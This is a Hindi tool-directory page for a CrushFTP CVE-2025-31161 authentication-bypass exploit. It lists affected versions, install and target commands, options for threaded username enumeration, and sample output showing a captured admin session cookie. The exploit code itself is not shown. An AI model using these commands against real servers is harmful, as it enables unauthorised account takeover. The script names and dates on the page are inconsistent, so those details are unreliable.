Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/tx-one/cve-2025-31161
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubtx-one/cve-2025-31161

CVE-2025-31161

CrushFTP CVE-2025-31161 एक्सप्लॉइट टूल 🔓

रिपॉजिटरी देखें
251 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CrushFTP CVE-2025-31161 Exploit Tool 🔓

CrushFTP के संवेदनशील संस्करणों में CVE-2025-31161 भेद्यता के लिए उन्नत पहचान और शोषण उपकरण।

CVE-2025-31161 CrushFTP वेब इंटरफ़ेस में एक गंभीर प्रमाणीकरण बायपास भेद्यता है। HTTP Authorization हेडर में हेरफेर करके, एक अप्रमाणित हमलावर सही पासवर्ड दिए बिना किसी भी मान्य उपयोगकर्ता नाम के तहत पूर्ण पहुँच प्राप्त कर सकता है।

प्रभावित संस्करण

CrushFTP 9.3.8

CrushFTP 9.3.9

CrushFTP 9.3.10

CrushFTP 9.3.11

CrushFTP 9.3.12

CrushFTP Enterprise 9.3.12.5 से पहले के संस्करण

मुख्य विशेषताएँ 🚀

  • स्वचालित CrushFTP संस्करण पहचान और भेद्यता सत्यापन
  • तीव्र उपयोगकर्ता गणना के लिए मल्टी-थ्रेडेड क्रेडेंशियल परीक्षण
  • दोहरी प्रमाणीकरण विधि समर्थन (Bearer Token और Basic Auth)
  • सत्र कुकीज़ के साथ JSON रिपोर्ट निर्माण
  • कस्टम कॉन्फ़िगरेशन के साथ स्मार्ट कनेक्शन पुनः प्रयास तंत्र
  • रंगीन कंसोल आउटपुट और विस्तृत लॉगिंग
  • संवेदनशील संस्करण कवरेज:
    • 9.3.8 से 9.3.12.5 तक

आवश्यकताएँ 📋

  • Python 3.8+

  • आवश्यक पैकेज:

    pip install requests colorama urllib3
    

    स्थापना 🛠️

  1. निर्भरताएँ स्थापित करें:
 pip install requests colorama urllib3
  1. रिपॉजिटरी क्लोन करें:
 git clone https://github.com/TX-One/CVE-2025-31161.git
 cd CVE-2025-31161
 python3 tx-crush.py -h

उपयोग 🖥️

मूल कमांड:

python3 CVE-2025-31161.py -t https://target:8080 -u users.txt -o results.json

विकल्प:

-h, --help            यह सहायता संदेश दिखाएँ और बाहर निकलें
  -t, --target TARGET   लक्ष्य URL (जैसे, https://example.com:8080)
  -u, --users USERS     उपयोगकर्ता नाम सूची वाली फ़ाइल
  -o, --output OUTPUT   आउटपुट JSON फ़ाइल
  -T, --threads THREADS
                        थ्रेड्स की संख्या (डिफ़ॉल्ट: 5)
  --no-ssl              SSL सत्यापन अक्षम करें
  --timeout TIMEOUT     अनुरोध टाइमआउट (डिफ़ॉल्ट: 15)
  --retries RETRIES     पुनः प्रयासों की संख्या (डिफ़ॉल्ट: 3)
  --force               संस्करण जाँच को बायपास करें

उन्नत उदाहरण:

python3 exploit.py
  -t https://vulnerable-server.com:8000
  -u ./wordlists/common_users.txt
  -o ./results/compromised.json
  -T 10
  --retries 5
  --timeout 20

नमूना आउटपुट 📄

[
  {
    "target": "https://victim:8080",
    "user": "admin",
    "success": true,
    "method": "Bearer",
    "cookies": {"sessionID": "a1b2c3..."},
    "server_version": "CrushFTP/9.3.12"
  }
]
[
  {
        "target": "http://victim:8080",
        "user": "admin",
        "success": false
    }
]

अस्वीकरण: यह परियोजना केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। जिम्मेदार उपयोग आवश्यक है।

टूल डाउनलोड करें